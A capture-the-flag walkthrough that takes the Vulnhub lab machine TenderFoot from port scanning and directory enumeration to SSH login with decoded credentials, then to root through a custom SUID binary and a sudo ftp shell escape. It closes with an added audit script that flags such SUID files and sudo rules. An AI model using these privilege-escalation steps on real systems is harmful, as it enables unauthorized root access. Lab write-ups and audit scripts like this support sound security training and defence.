In this post, we are going to solve another Vulnhub machine called TenderFoot. This is another boot-2-root challenge that you can download from Vulnhub.
Network Scanning
Let’s start with network scanning, discovering the target IP address.
    sudo netdiscover
Now we have the target machine's IP address, and our next step is to scan it to find open ports and running services.
    sudo nmap -A -p- 192.168.43.187
Only two ports are open on the target machine: 22/SSH and 80/HTTP, the latter running the Apache httpd service.
Enumeration
Let’s explore the IP in the browser.
After navigating to the target machine's IP we see the Apache2 Ubuntu web page, along with a hint that we need to run a directory enumeration tool.
Let’s run gobuster to discover hidden files and web pages on the server.
    wordlist="/opt/seclists/Discovery/Web-Content/directory-list-2.3-big.txt"
    gobuster dir -u http://192.168.43.187 -w $wordlist -x .php,.txt,.js,/,.html
We found many hidden directories; let’s open each one in the browser to find some useful information.
    http://192.168.43.187/entry.js
    http://192.168.43.187/fotocd
First, we open entry.js, where we see the name monica. Next we open the fotocd directory, where we find a brainfuck-encoded string.
We decode the brainfuck-encoded string online at <sange.fi>. The output gives a hint for the SSH login and contains a base64-encoded string, so let’s decode it.
The decoded output is $99990$. Since we found the username monica, let’s try to log in to the SSH server using these credentials.
    ssh monica@192.168.43.187
Now we are logged in as the monica user, and in the user's home directory we find our first flag. Let’s start enumerating to find some useful information.
    ls
    cat user1.txt | tail -n 9
Privilege Escalation
Without wasting time, we run the find command to list the binaries that have the SUID bit set.
    find / -type f -perm -u=s 2>/dev/null
We found a custom-made binary; let’s execute it. Our current user changes to chandler.
    /opt/exec/chandler
    cd /home/chandler
    ls -la
We are now running as chandler, but we do not have many more permissions. We enumerate the home directory again and find a base64-encoded key.
    cd .cache/
    ls
    cat note.txt
We decode the key and find another password. First we try this password for the root user, but the login fails. Then we try it for chandler and successfully switch our current user.
    su chandler
    sudo -l
Again we check the sudo permissions: our current user can run the ftp command with sudo. Let’s run the privilege escalation command.
    sudo ftp
    !/bin/bash
    cd /root
    ls
    cat proof.txt
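From the defender's side, both steps of this privilege escalation (a custom SUID binary under /opt and a sudo rule for ftp) show up in a routine audit. The script below is an added example, not part of the original walkthrough; the baseline directory list, the function names and the sample inputs are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original post: flag the two weaknesses used above.

# Directories where packaged SUID binaries normally live (assumed baseline).
SUID_BASELINE='^/(usr/)?(s?bin|lib[^/]*|libexec)/|^/snap/'

# stdin: SUID paths, one per line (output of the find command in this post).
# stdout: paths outside the baseline directories, for manual review.
unusual_suid() {
    awk -v re="$SUID_BASELINE" '/^\// && $0 !~ re'
}

# stdin: output of `sudo -l -U <user>`, collected by an administrator.
# $1: space-separated watchlist of programs with an interactive shell escape.
# stdout: granted commands that are ALL or whose basename is on the watchlist.
risky_sudo() {
    awk -v watch=" ${1:-ftp} " '
    /^[ \t]*\(/ {
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "")   # drop the (runas) prefix
        gsub(/[A-Z_]+:[ \t]*/, "")          # drop tags such as NOPASSWD:
        n = split($0, cmds, /,[ \t]*/)
        for (i = 1; i <= n; i++) {
            split(cmds[i], w, " ")
            base = w[1]; sub(/.*\//, "", base)
            if (w[1] == "ALL" || (base != "" && index(watch, " " base " ")))
                print w[1]
        }
    }'
}

# Constructed sample inputs; only /opt/exec/chandler and ftp come from the post.
sample_suid() {
    cat <<'EOF'
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/opt/exec/chandler
EOF
}
sample_sudo() {
    cat <<'EOF'
User chandler may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/ftp
    (root) /usr/sbin/service apache2 restart, /usr/bin/systemctl status ssh
EOF
}

sample_suid | unusual_suid
sample_sudo | risky_sudo ftp
```

On a real host, pipe the output of the find command and of `sudo -l -U <user>` into the two functions in place of the sample data.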